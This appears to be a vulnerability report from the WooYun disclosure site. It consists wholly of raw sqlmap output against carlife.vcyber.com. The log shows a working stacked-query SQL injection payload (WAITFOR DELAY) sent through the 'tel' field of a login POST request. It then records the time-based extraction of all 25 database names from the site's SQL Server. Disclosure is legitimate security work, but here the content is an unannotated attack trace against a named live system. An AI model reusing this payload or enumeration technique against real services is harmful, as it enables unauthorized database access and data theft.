WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: usercode=111111111111&userpwd=11111111&tel=13800138000';WAITFOR DEL
AY '0:0:5'--&logincode=111111&loginpwd=123456&gender=%E7%94%B7&realName=admin&te
lnum=010
---
[23:26:56] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:26:56] [INFO] fetching database names
[23:26:56] [INFO] fetching number of databases
[23:26:56] [INFO] resumed: 25
[23:26:56] [INFO] resuming partial value: A
[23:26:56] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[23:26:56] [WARNING] time-based comparison requires larger statistical model, pl
ease wait.............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[23:27:28] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[23:27:38] [INFO] adjusting time delay to 1 second due to good response times
pec
[23:27:59] [ERROR] invalid character detected. retrying..
[23:27:59] [WARNING] increasing time delay to 2 seconds
n.Music
[23:29:10] [ERROR] invalid character detected. retrying..
[23:29:10] [WARNING] increasing time delay to 3 seconds
[23:29:19] [ERROR] invalid character detected. retrying..
[23:29:19] [WARNING] increasing time delay to 4 seconds
DB
[23:29:44] [INFO] retrieved: Around
[23:31:46] [ERROR] invalid character detected. retrying..
[23:31:46] [WARNING] increasing time delay to 5 seconds
System
[23:34:04] [ERROR] invalid character detected. retrying..
[23:34:04] [WARNING] increasing time delay to 6 seconds
DB
[23:34:39] [INFO] retrieved: C
[23:35:14] [ERROR] invalid character detected. retrying..
[23:35:14] [WARNING] increasing time delay to 7 seconds
arStatus
[23:38:55] [INFO] retrieved: carvp_mo
[23:43:32] [ERROR] invalid character detected. retrying..
[23:43:32] [WARNING] increasing time delay to 8 seconds
b
[23:44:24] [ERROR] invalid character detected. retrying..
[23:44:24] [WARNING] increasing time delay to 9 seconds
ile
[23:46:10] [INFO] retrieved: CMS
[23:47:30] [INFO] retrieved: CMSDB
[23:49:38] [INFO] retrieved: ContentManagementSystem
[00:03:46] [INFO] retrieved: DBOnlin
[00:08:34] [ERROR] invalid character detected. retrying..
[00:08:34] [WARNING] increasing time delay to 10 seconds
e
[00:09:08] [INFO] retrieved: distrib
[00:14:26] [ERROR] invalid character detected. retrying..
[00:14:26] [WARNING] increasing time delay to 11 seconds
ution
[00:18:39] [INFO] retrieved: EX
[00:20:36] [ERROR] invalid character detected. retrying..
[00:20:36] [WARNING] increasing time delay to 12 seconds
TERNAL_CDR
[00:27:11] [INFO] retrieved: HBS
[00:29:31] [ERROR] invalid character detected. retrying..
[00:29:31] [WARNING] increasing time delay to 13 seconds
Contact
[00:35:36] [INFO] retrieved: InterFaceDB
[00:43:35] [INFO] retrieved: master
[00:48:34] [INFO] retrieved: Mobil
[00:53:34] [ERROR] invalid character detected. retrying..
[00:53:34] [WARNING] increasing time delay to 14 seconds
e
[00:55:03] [ERROR] invalid character detected. retrying..
[00:55:03] [WARNING] increasing time delay to 15 seconds
[00:55:51] [ERROR] invalid character detected. retrying..
[00:55:51] [WARNING] increasing time delay to 16 seconds
SoundConsole
[01:09:35] [INFO] retrieved: model
[01:15:22] [INFO] retrieved: msdb
[01:19:31] [INFO] retrieved: Pus
[01:23:55] [ERROR] invalid character detected. retrying..
[01:23:55] [WARNING] increasing time delay to 17 seconds
hMessage
[01:32:07] [INFO] retrieved: SpeechDB
[01:40:25] [INFO] retrieved: tempdb
[01:47:43] [INFO] retrieved: Transcode
[01:57:39] [INFO] retrieved: vCyber
[02:03:49] [INFO] retrieved: vJTCyber
[02:12:02] [INFO] retrieved: WebServiceLogDB
[02:27:15] [INFO] retrieved: www_carvp
[02:40:22] [ERROR] invalid character detected. retrying..
[02:40:22] [WARNING] increasing time delay to 18 seconds
_cn
[02:44:23] [INFO] retrieved: ZYKJDB
available databases [25]:
[*] [Apecn.MusicDB]
[*] AroundSystemDB
[*] CarStatus
[*] carvp_mobile
[*] CMS
[*] CMSDB
[*] ContentManagementSystem
[*] DBOnline
[*] distribution
[*] EXTERNAL_CDR
[*] HBSContact
[*] InterFaceDB
[*] master
[*] MobileSoundConsole
[*] model
[*] msdb
[*] PushMessage
[*] SpeechDB
[*] tempdb
[*] Transcode
[*] vCyber
[*] vJTCyber
[*] WebServiceLogDB
[*] www_carvp_cn
[*] ZYKJDB
[02:50:00] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\carlife.vcyber.com'
[*] shutting down at 02:50:00